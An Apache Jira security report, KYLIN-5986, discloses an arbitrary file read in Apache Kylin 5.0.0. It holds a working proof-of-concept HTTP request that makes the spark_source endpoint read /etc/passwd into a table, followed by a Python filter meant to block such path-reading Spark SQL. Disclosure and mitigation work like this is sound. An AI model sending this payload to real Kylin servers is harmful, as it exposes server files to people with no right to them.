Longfei Jiang created KYLIN-5986:
------------------------------------

Summary: [Security] Apache kylin read any file
Key: KYLIN-5986
URL: https://issues.apache.org/jira/browse/KYLIN-5986
Project: Kylin
Issue Type: Bug
Affects Versions: 5.0.0
Reporter: Longfei Jiang
Fix For: 5.0.1
Attachments: Fwd_ [Security]Apache kylin read any file.eml, image-2025-02-13-11-11-05-091.png, image-2025-02-13-11-11-30-021.png, image-2025-02-13-11-11-40-004.png, image-2025-02-13-11-11-48-871.png, image-2025-02-13-11-11-57-464.png
## 1. Start kylin-docker

```sh
docker run --platform=linux/amd64 -d --name Kylin5-Machine --hostname localhost -e TZ=UTC -m 10G -p 7070:7070 -p 8088:8088 -p 9870:9870 -p 8032:8032 -p 8042:8042 -p 2181:2181 apachekylin/apache-kylin-standalone:5.0.0-GA
```

## 2. Change kylin.properties

Add `kylin.env.channel=cloud` to the file `kylin.properties`. This is required to make `org.apache.kylin.rest.controller.SparkSourceController` available; without it the endpoint used below is not registered.

!image-2025-02-13-11-11-05-091.png!

## 3. Restart the server

```sh
./kylin.sh stop
./kylin.sh start
```

# Exploit

1. Log in to the backend using an administrator account.

2. Send an HTTP request to `/kylin/api/spark_source/execute` to execute Spark SQL. The statement below uses Spark's `format.`path`` table syntax to read a file from the server's local filesystem into a new table:

```http
POST /kylin/api/spark_source/execute HTTP/1.1
Host: 127.0.0.1:7070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: application/vnd.apache.kylin-v4+json
Accept-Language: cn
Accept-Encoding: gzip, deflate, br
Auto: false
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:7070/kylin/
Cookie: c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2; session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Content-Length: 94

{"sql":"CREATE TABLE temp_tablea AS SELECT * from text.`file:///etc/passwd`","database":"SSB"}
```

!image-2025-02-13-11-11-30-021.png!

3. Add a new source.

!image-2025-02-13-11-11-40-004.png!

4. Click `Refresh now` to load the tables.

!image-2025-02-13-11-11-48-871.png!

5. Execute the SQL statement `select * from SSB.TEMP_TABLEA` to get the contents of the `/etc/passwd` file.

!image-2025-02-13-11-11-57-464.png!
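The statement in step 2 works because Spark SQL resolves `text.`file:///etc/passwd`` as a direct read of a path, so any endpoint that forwards user SQL to Spark unchanged also forwards filesystem access on the driver host. The following is an added example, not code from this report or from Apache Kylin: a pre-execution filter that a service fronting such an endpoint could apply. It covers the `format.`path`` vector from the report and, as a generalization, the other Spark SQL constructs that name a path (`LOCATION '...'`, `OPTIONS (path '...')`, `LOAD DATA LOCAL INPATH`), denying anything whose scheme is not on an allow-list. The function names and the allow-listed schemes are assumptions for illustration.

```python
"""Pre-execution filter for Spark SQL submitted to an arbitrary-SQL endpoint.

Added example, not code from the KYLIN-5986 report or from Apache Kylin.
Spark SQL can read a path directly with the  format.`path`  table syntax
(e.g. text.`file:///etc/passwd`, the vector in the report), with
CREATE TABLE ... USING fmt OPTIONS (path '...') / LOCATION '...', and with
LOAD DATA LOCAL INPATH. This filter rejects all of those unless the path
uses an allow-listed remote scheme. Function names and the scheme list are
assumptions for illustration.
"""
import re

# Assumption: these are the only filesystems SQL users may read. Scheme-less
# paths resolve against fs.defaultFS (the driver's local disk on a standalone
# install), so they are denied as well.
ALLOWED_SCHEMES = frozenset({"hdfs", "s3a", "abfs", "gs"})

# Spark's built-in file-based data source short names.
SPARK_PATH_FORMATS = ("text", "csv", "json", "parquet", "orc", "avro", "binaryfile", "libsvm")

# Strip comments first so "text/*x*/.`file:///...`" cannot slip past the match.
_COMMENT_RE = re.compile(r"--[^\n]*|/\*.*?\*/", re.DOTALL)
_PATH_TABLE_RE = re.compile(
    r"\b(" + "|".join(SPARK_PATH_FORMATS) + r")\s*\.\s*`([^`]*)`", re.IGNORECASE)
_LOCATION_RE = re.compile(r"\bLOCATION\s*'([^']*)'", re.IGNORECASE)
_OPTIONS_RE = re.compile(r"\bOPTIONS\s*\(([^)]*)\)", re.IGNORECASE)
_PATH_OPTION_RE = re.compile(r"'?path'?\s*=?\s*'([^']*)'", re.IGNORECASE)
_LOAD_LOCAL_RE = re.compile(r"\bLOAD\s+DATA\s+LOCAL\s+INPATH\b", re.IGNORECASE)


def strip_comments(sql):
    return _COMMENT_RE.sub(" ", sql)


def path_scheme(path):
    """URI scheme of a Hadoop path ('file', 'hdfs', ...) or '' if it has none."""
    m = re.match(r"\s*([A-Za-z][A-Za-z0-9+.-]*):", path)
    return m.group(1).lower() if m else ""


def find_path_references(sql):
    """Every (construct, path) pair through which the statement names a filesystem path."""
    text = strip_comments(sql)
    refs = [(m.group(1).lower() + ".`path`", m.group(2)) for m in _PATH_TABLE_RE.finditer(text)]
    refs += [("LOCATION", m.group(1)) for m in _LOCATION_RE.finditer(text)]
    for opts in _OPTIONS_RE.finditer(text):
        refs += [("OPTIONS path", m.group(1)) for m in _PATH_OPTION_RE.finditer(opts.group(1))]
    return refs


def find_violations(sql):
    """Reasons the statement must not be executed; an empty list means it may run."""
    reasons = []
    if _LOAD_LOCAL_RE.search(strip_comments(sql)):
        reasons.append("LOAD DATA LOCAL INPATH reads the Spark driver's local filesystem")
    for construct, path in find_path_references(sql):
        scheme = path_scheme(path)
        if scheme not in ALLOWED_SCHEMES:
            reasons.append(f"{construct} references {path!r} (scheme {scheme or 'none'} not allowed)")
    return reasons


if __name__ == "__main__":
    # Constructed inputs: the statement from the report and a legitimate warehouse read.
    for stmt in ("CREATE TABLE temp_tablea AS SELECT * from text.`file:///etc/passwd`",
                 "SELECT * FROM parquet.`hdfs:///warehouse/ssb/lineorder`"):
        print(stmt, "->", find_violations(stmt) or "ok")
```

The filter is deliberately deny-by-default: a database that happens to be named `text` would be flagged, which is the right trade-off for a control sitting in front of `CREATE TABLE ... AS SELECT`. It is also only defence in depth. The underlying issue is that an authenticated web endpoint hands arbitrary Spark SQL to a driver that can see the host filesystem, so the durable fixes are to not expose such an endpoint at all (or keep it behind the `kylin.env.channel` gate) and to run the driver with no access to files beyond the warehouse.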
The detailed information can be found in the email attachment: `Fwd_ [Security]Apache kylin read any file.eml`

--
This message was sent by Atlassian Jira
(v8.20.10#820010)